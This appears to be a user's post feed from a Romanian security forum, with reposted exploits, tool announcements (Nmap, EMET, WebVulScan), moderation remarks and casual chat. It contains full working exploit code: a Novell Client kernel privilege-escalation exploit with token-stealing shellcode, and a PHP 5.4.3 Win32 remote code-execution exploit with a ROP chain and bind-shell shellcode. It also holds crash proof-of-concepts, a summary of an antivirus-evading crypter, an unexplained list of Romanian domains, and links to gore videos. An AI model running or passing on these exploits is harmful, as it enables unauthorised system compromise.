Nytro

Ai un post e blog: Shell | TuR334VL Blog Cica: "@author TuR334VL" Si am gasit asta: ?><?php /** * @author Ikram ALI * @copyright 2012 */ @de - Pastebin.com Care cam seamana cu ce zici tu ca ai facut. Concluzia: ban. Oamenii ca tine, care nu stiu sa ofere credite pentru munca altora, care se lauda cu munca altora, o fura, nu au ce cauta aici.

Nmap Port Scanner 6.00 Authored by Fyodor | Site insecure.org Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings. Changes: NSE has been enhanced, there is better web scanning, full IPv6 support added, a new nping tool, better zenmap gui, and faster scans. First major release since 2009. Download: http://packetstormsecurity.org/files/download/112951/nmap-6.00.tgz Sursa: Nmap Port Scanner 6.00 ? Packet Storm

Link: http://packetlife.net/library/cheat-sheets/

[h=1]Novell Client 4.91 SP4 Privilege Escalation Exploit[/h]Author: sickness # Novell Client 4.91 SP3/4 Privilege escalation exploit # Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~ # # SecurityFocus: http://www.securityfocus.com/bid/27209/info # CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762 # Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~ # # Author: sickness@offensive-security.com # Version Tested: Novell Client 4.91 SP4 # Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1) # Thanks: # - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible. # - ryujin for the help while developing the exploit. from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi = windll.Psapi def GetBase(drvname=None): EVIL_ARRAY = 1024 myarray = c_ulong * EVIL_ARRAY lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddr in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddr: Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[>] Retrieving %s information." % drvname print "[>] %s base address: %s" % (drvname, hex(baseaddr)) return baseaddr else: if drivername.value.lower().find("krnl") !=-1: print "[>] Retrieving Kernel information." print "[>] Kernel version: ", drivername.value print "[>] Kernel base address: %s" % hex(baseaddr) return (baseaddr, drivername.value) return None if __name__ == '__main__': usage = "%prog -o <target>" parser = OptionParser(usage=usage) parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: XP, 2K3") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['XP','2K3']: parser.print_help() sys.exit() OS = OS.upper() GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE = '\\\\.\\nicm' device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) (krnlbase, kernelver) = GetBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase HalBase = GetBase("hal.dll") print "[>] HalDispatchTable address:", hex(HalDispatchTable) HalDispatchTable0x4 = HalDispatchTable + 0x4 HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4 HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10 if OS == "2K3": HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003 HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003 else: HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP HalpSetSystemInformation = HalBase + 0x19436# Offset for XP print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL retn = c_ulong() inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite inut_size = 0x0 output_buffer = 0x41414141 # Junk output_size = 0x0 # Get offsets if OS == "2K3": _KPROCESS = "\x38" # Offset for 2003 _TOKEN = "\xd8" # Offset for 2003 _UPID = "\x94" # Offset for 2003 _APLINKS = "\x98" # Offset for 2003 else: _KPROCESS = "\x44" # Offset for XP _TOKEN = "\xc8" # Offset for XP _UPID = "\x84" # Offset for XP _APLINKS = "\x88" # Offset for XP # Restore the pointer pointer_restore = "\x31\xc0" + \ "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) # Make the evil token stealing steal_token = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x10" # Build the shellcode sc = "\x90" * 100 sc+= pointer_restore + steal_token sc+= "\x90" * 100 if OS == "2K3": baseadd = c_int(0x02a6ba10) else: baseadd = c_int(0x026e7bb0) MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zero_Bits = c_int(0) RegionSize = c_int(0x1000) write = c_int(0) dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) if OS == "2K3": kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write)) else: kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write)) if device_handler: print "[>] Sending IOCTL to the driver." dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) evil_in = c_ulong() evil_out = c_ulong() evil_in = 0x1337 hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out)) print "[>] Launching shell as SYSTEM." os.system("cmd.exe /K cd c:\\windows\\system32") Sursa: Novell Client 4.91 SP4 Privilege Escalation Exploit

[h=1]PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce[/h] <?php /* PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce Author : condis Date : 10.04.2012 AD Website : http://cond.psychodela.pl ---- Download : http://php.net/downloads.php Tested on: PHP 5.3.8 + Windows XP SP3 Professional PL PHP 5.3.10 + Windows XP SP3 Professional PL PHP 5.4.0 + Windows XP SP3 Professional PL PHP 5.4.3 + Windows XP SP3 Professional PL Description: wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant object when it is given as a first argument. Registers: EAX 00000000 ECX 1056AAE8 php5ts.1056AAE8 EDX 100EFCE0 php5ts.100EFCE0 EBX 01032AB0 ESP 00C0FAE0 EBP 00000000 ESI 0121E478 EDI 0121CB50 EIP 1028F22E php5ts.1028F22E Crash: 1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25] Situation looks pretty much the same for both wddx_serialize_vars and wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append have some problems with handling Variant object when given as a second argument: stream_bucket_append(1, new Variant(1)); stream_bucket_prepend(1, new Variant(1)); PS : Variant object is only available in PHP for Windows OS and it was implemented in PHP > 4.1.0 and PHP 5. For more details check : http://php.net/manual/en/class.variant.php PS2: After running this via webserver my Apache wasn't able to handle requests anymore and I had to restart him kthxbye */ wddx_serialize_value(new Variant(666)); ?> Sursa: PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce

Se vrea a trimite request-uri HTTP cu JavaScript (jsHTTP). Vezi sursa.

Sa isi porteze si Mozilla/Google browserele pe ARM si nu cred ca o sa fie probleme. Daca eram Microsoft ma pisam pe Mozilla si pe Google, nu bagam niciun "Browser choice", sa isi faca si Mozilla un sistem de operare, iar Google sa bage "Browser choice" pe Android, poate vreau sa folosesc Internet Explorer pe Android, e problema mea. Deci muie pretentiilor cu care vin Mozilla si Google.

Nu mai bine luati voi ban pe forum, in loc sa ajungeti la puscarie pentru niste rahaturi?

[h=3]WebVulScan - web application vulnerability scanner[/h][h=2]May 13, 2012[/h] WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found. After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited. The vulnerabilities tested by WebVulScan are: Reflected Cross-Site Scripting Stored Cross-Site Scripting Standard SQL Injection Broken Authentication using SQL Injection Autocomplete Enabled on Password Fields Potentially Insecure Direct Object References Directory Listing Enabled HTTP Banner Disclosure SSL Certificate not Trusted Unvalidated Redirects Features: Crawler: Crawls a website to identify and display all URLs belonging to the website. Scanner: Crawls a website and scans all URLs found for vulnerabilities. Scan History: Allows a user to view or download PDF reports of previous scans that they performed. Register: Allows a user to register with the web application. Login: Allows a user to login to the web application. Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default). PDF Generation: Dynamically generates a detailed PDF report. Report Delivery: The PDF report is emailed to the user as an attachment. This software was developed, and should only be used, entirely for ethical purposes. Running security testing tools such as this on a website (web application) could damage it. In order to stay ethical, you must ensure you have permission of the owners before testing a website (web application). Testing the security of a website (web application) without authorisation is unethical and against the law in many countries. Download: https://code.google.com/p/webvulscan/downloads/list Source: https://code.google.com/p/webvulscan/ Via: Defcamp

MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege Microsoft update release Microsoft Security Bulletin MS12-032 - Important : Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338) Possible MS12-032 Proof of concept from StackOverflow thx to @avivra We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines. // the program attempts to bind to IPV6-mapped IPV4 address // in a tight loop. If the address is not configured on the machine // running the program crashes Windows Server 2008 R2 (if program is 32-bit) #include #include #include #include #define IPV6_V6ONLY 27 void MyWsaStartup() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(2, 2); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) { printf("WSAStartup failed with error: %d\n", err); exit(-1); } } void main() { MyWsaStartup(); bool bindSuccess = false; while(!bindSuccess) { SOCKET sock = WSASocket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); if(sock == INVALID_SOCKET) { printf("WSASocket failed\n"); exit(-1); } DWORD val = 0; if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (const char*)&val, sizeof(val)) != 0) { printf("setsockopt failed\n"); closesocket(sock); exit(-1); } sockaddr_in6 sockAddr; memset(&sockAddr, 0, sizeof(sockAddr)); sockAddr.sin6_family = AF_INET6; sockAddr.sin6_port = htons(5060); // set address to IPV6-mapped 169.13.13.13 (not configured on the local machine) // that is [::FFFF:169.13.13.13] sockAddr.sin6_addr.u.Byte[15] = 13; sockAddr.sin6_addr.u.Byte[14] = 13; sockAddr.sin6_addr.u.Byte[13] = 13; sockAddr.sin6_addr.u.Byte[12] = 169; sockAddr.sin6_addr.u.Byte[11] = 0xFF; sockAddr.sin6_addr.u.Byte[10] = 0xFF; int size = 28; // 28 is sizeof(sockaddr_in6) int nRet = bind(sock, (sockaddr*)&sockAddr, size); if(nRet == SOCKET_ERROR) { closesocket(sock); Sleep(100); } else { bindSuccess = true; printf("bind succeeded\n"); closesocket(sock); } } }by d3v1l at 22:37 Sursa: Security-Shell: MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. [h=3]Introducing EMET v3[/h] swiat 15 May 2012 11:00 AM We are pleased to announce the release of a new version of our Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. EMET it is a free utility that helps prevent vulnerabilities in software from being successfully exploited for code execution. It does so by opt-ing in software to the latest security mitigation technologies. The result is that a wide variety of software is made significantly more resistant to exploitation – even against zero day vulnerabilities and vulnerabilities for which an update has not yet been applied. Download it here: Download: EMET - Microsoft Download Center - Download Details This new version of the tool being released today addresses top feedback themes we have heard from users: EMET needs more enterprise configuration, deployment and reporting options. We have seen growing interest in adoption from enterprise and large scale networks and this new version includes enhancements for that segment. Here are some of the highlights of and new features in EMET 3.0. Making configuration easy Enterprise deployment via Group Policy and SCCM Reporting capability via the new EMET Notifier feature Configuration EMET 3.0 comes with three default "Protection Profiles". Protection Profiles are XML files that contain pre-configured EMET settings for common Microsoft and third-party applications. Under EMET’s installation directory, these files are in the Deployment\Protection Profiles folder. You can enable them as-is, modify them, or create new protection profiles based on them. The three profiles that ship with EMET 3.0 are: Internet Explorer.xml: Enables mitigations for supported versions of Microsoft Internet Explorer. Office Software.xml: Enables mitigations for supported versions of Microsoft Internet Explorer, applications that are part of the Microsoft Office suite, Adobe Acrobat 8-10 and Adobe Acrobat Reader 8-10. All.xml: Enables mitigations for common home and enterprise applications, including Microsoft Internet Explorer and Microsoft Office. Looking inside a profile, we see a list of programs with EMET mitigations. The example below shows all EMET mitigations enabled for Windows Media Player, with the exception of Mandatory ASLR: <Product Name="Windows Media player"> <Version Path="*\Windows Media Player\wmplayer.exe"> <Mitigation Enabled="false" Name="MandatoryASLR"/> </Version> </Product> Notice the “*” in the Path attribute above? In EMET 3.0, we also expanded the EMET grammar rules. Existing rules that you might have continue to work as-is and it is possible now to also use wildcards in EMET rules. This means that you no longer have to use the full path of an application in EMET rules. You can use the “*” character or simply use the image name, such as “iexplore.exe” in your rules. EMET will protect them regardless of where these applications may be installed. This has been one of the most requested features. Deployment EMET also comes with built-in support for enterprise deployment and configuration technologies. This enables administrators to use Group Policy or System Center Configuration Manager to deploy, configure and monitor EMET installations across the enterprise environment. For Group Policy: EMET includes an ADMX file that contains the three protection profiles mentioned above as policies that can be enabled/disabled through group policy. There is also a policy that demonstrates how to add custom EMET settings. For System Center Configuration Manager: The SCCM team blog post this morning provides a package and instructions for integration with various SCCM features. Read that blog post here: Welcome to Windows Live Reporting With EMET 3.0, we have included an additional new reporting capability that we call "EMET Notifier". When you install EMET 3.0, this lightweight component is set to automatically start with Windows. It will show up in the notification area of your taskbar with an EMET 3.0 icon. EMET Notifier has two duties: Write events out to the Windows Event Log Show important events via a tooltip in the taskbar notification area EMET events are logged via the event source called EMET. These logs can be found in the Application log. There are three levels: Information, Warning and Error. Information messages are used for logging usual operation such as the EMET Notifier starting. Warning messages are used when EMET settings change. Error messages are used for logging cases where EMET stopped an application with one of its mitigations, which means an active attack has been blocked. An example entry can be seen below. In addition to the error messages written to the Windows Event Log, when an EMET mitigation stops (crashes) an application by blocking an exploit, a message is displayed for the user. A toast style taskbar notification states which application is being stopped and which mitigation is causing EMET to stop it. You can see an example below. Other EMET v3 developments In addition to these features, EMET 3.0 comes with a number of other improvements and bug fixes. More details and a FAQ can be found in the User Guide that comes with the install. However, we would like to specifically highlight a couple of things here. First, we have tested EMET 3.0 on the Windows 8 Consumer Preview and it works great - we encountered no problems at all so we encourage you to use EMET on all versions of Windows. Second, EMET 3.0 can be installed just fine on a system where EMET 2.1 (the previous release) was already installed. An upgrade or a new installation is no different. Your existing rules built for EMET 2.1 will continue to work just fine with EMET 3.0. Third, we would like to point out that EMET is an officially-supported Microsoft tool. That is a question we get a lot from enterprise customers. Microsoft's Customer Service & Support team offers forums-based support via Enhanced Mitigation Experience Toolkit (EMET) Support Forum. We in MSRC Engineering are also very eager to promote EMET and help you use it so we are quick to respond to feedback, ideas, suggestions, or questions via switech -at- microsoft -dot- com. Please do not hesitate to reach out to us. Acknowledgements I would like to thank Chengyun Chu, Elias Bachaalany, Elia Florio, Jinwook Shin, Neil Sikka, and Nitin Kumar Goel for their various contributions to this release. Also a big thank you to Jason Githens and Hema Rajalakshmi from the System Center Configuration Manager team for their help and support. - Suha Can, MSRC Engineering (EMET 3.0 release owner) Sursa: Introducing EMET v3 - Security Research & Defense - Site Home - TechNet Blogs

Da, deci e o porcarie, daca tot faci sniffing iei cookie/session, nu cred ca se face logare pe baza de IP sau mai stiu eu ce.

Hyperion: Implementation of a PE-Crypter Christian Ammann May 8, 2012 1 Introduction Runtime crypter accepts binary executable files as input and transforms them into an encrypted version (preserving its original behaviour). The encrypted file decrypts itself on startup and executes it’s original content. This approach allows the deployment of malicious executables in protected environments: A pattern based anti virus (AV) solution detects the signature of suspicious files and blocks their execution. The encrypted counterpart contains an unknown signature, it’s content can not be analysed by heuristics and is therefore executed normally without an intervention by the AV scanner. Other uses are protection of binaries against reversing or the replacement of the encryption routine with a packer to reduce the size of an executable. This paper reveals the theoretic aspects behind run-time crypters and describes a reference implementation for Portable Executables (PE) [1] which is the windows file format for dynamic-link libraries (DLLs), object files and regular executables. The encryption of Windows executables requires a general understanding of the following aspects: PE layout: The PE header, section headers and data directory entries. PE loader: How and where are process images loaded and executed in virtual memory. We give a beginner friendly introduction to these two important topics in section 2. Afterwards, we present and explain the PE crypter reference implementation Hyperion in section 3 for 32-bit executables which can be divided into two parts (see figure 1 for details): A crypter and a container. The crypter (which is explained in more detail in section 3.1) gets a PE binary as input, copies the complete input file into memory, calculates a checksum and prepends the checksum to the input file. Afterwards, a random key is generated which is used to encrypt the checksum and the input file with the AES-128 [2] encryption algorithm. Finally, the encrypted result is copied into the containers data section. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf

[h=1]PHP 5.4 (5.4.3) Code Execution (Win32)[/h] // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) =================== offset-brute.html =================== <html><body> <title>0day</title> <center> <font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br> <textarea rows=50 cols=50 id="log"></textarea> </center> <script> function sleep(milliseconds) { var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){ break; } } } function makeRequest(url, parameters) { var xmlhttp = new XMLHttpRequest(); if (window.XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); if (xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { // IE try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!xmlhttp) { alert('Giving up Cannot create an XMLHTTP instance'); return false; } xmlhttp.open("GET",url,true); xmlhttp.send(null); return true; } test=document.getElementById("log"); for(offset=0;offset<300;offset++) { log.value+="Trying offset:"+offset+"\r\n"; makeRequest("0day.php?offset="+offset); sleep(500); } </script></body></html> =================== 0day.php =================== <?php $spray = str_repeat("\x90",0x200); $offset=$_GET['offset']; // 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] $spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1); // :> 0x048d0030 $spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] $spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); // Adress of VirtualProtect 0x7c801ad4 $spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); // LPVOID lpAddress = 0x048d0060 $spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); // SIZE_T dwSize = 0x01000000 $spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 $spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); // __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068 $spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] $spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4); // Ret Address = 0x048d0080 $spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); $stacktrack = "\xbc\x0c\xb0\xc0\x00"; // Universal win32 bindshell on port 1337 from metasploit $shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0". "\x81\xc4\xd0\xfd\xff\xff". "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; $spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); $fullspray=""; for($i=0;$i<0x4b00;$i++) { $fullspray.=$spray; } $j=array(); $e=array(); $b=array(); $a=array(); $c=array(); array_push($j,$fullspray); array_push($e,$fullspray."W"); array_push($b,$fullspray."A"); array_push($a,$fullspray."S"); array_push($c,$fullspray."!"); $vVar = new VARIANT(0x048d0038+$offset); // Shoot him com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] echo $arr; echo $spray; ?> Sursa: PHP 5.4 (5.4.3) Code Execution (Win32)

Ok, cand ajung acasa diseara, spuneti pe mess sa nu uit.

Nu e pentru tine probabil.

Aaaaanntoneescuu de traiaaa...

Utilizatorului unu_1234567 i-a fost scos rangul de V.I.P. pentru ca a profitat de acest aspect pentru a castiga incredere. Nu va primi ban, in niciun caz, datorita contributiile sale, cei cu vechime vor intelege. Speram sa nu se repete. Ramane la latitudinea voastra sa decideti "castigatorul" moral al disputei si daca va veti implica in trade-uri cu ei, tineti insa cont ca amandoi sunt persoane care merita respect, desi multi probabil nu stiti nimic despre ei.

Nu sunt fake tinere, in Africa inca se ard femei pe rug pentru vrajitorie, realitatea e dura. In Tibet calugaritele isi dau foc singure: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore Self Immolation of a Nun in Tibet | Best Gore Apoi, in mijlocu "civilizatiei": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/

Pff, nu imi place cum e facuta libraria, exemplul http://rolling-curl.googlecode.com/svn/trunk/example_groups.php nu cred ca te ajuta. Foloseste curl simplu, cu curl_multi_exec.

Photoshop CS5 (12.04 parca) crapa, dar nu se executa shellcode-ul. Are cineva CS5.1 sa incerce?

[TABLE=width: 720] [TR] [TD]1.[/TD] [TD]casadinpitesti.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]2.[/TD] [TD]smartprices.info[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]3.[/TD] [TD]www.activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]4.[/TD] [TD]www.originalhandmade.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]5.[/TD] [TD]activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]6.[/TD] [TD]www.ice-tropez.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]7.[/TD] [TD]www.novelresearch.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]8.[/TD] [TD]www.perlamamaia.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]9.[/TD] [TD]daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]10.[/TD] [TD]www.daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]11.[/TD] [TD]www.enovate.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]12.[/TD] [TD]www.casa-agave.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]13.[/TD] [TD]www.uniromexim.ro[/TD] [TD]Whois [+][/TD] [/TR] [/TABLE] Prietenii stiu de ce.

Sunt baieti buni amandoi (din alte puncte de vedere), vom vedea diseara ce e de facut.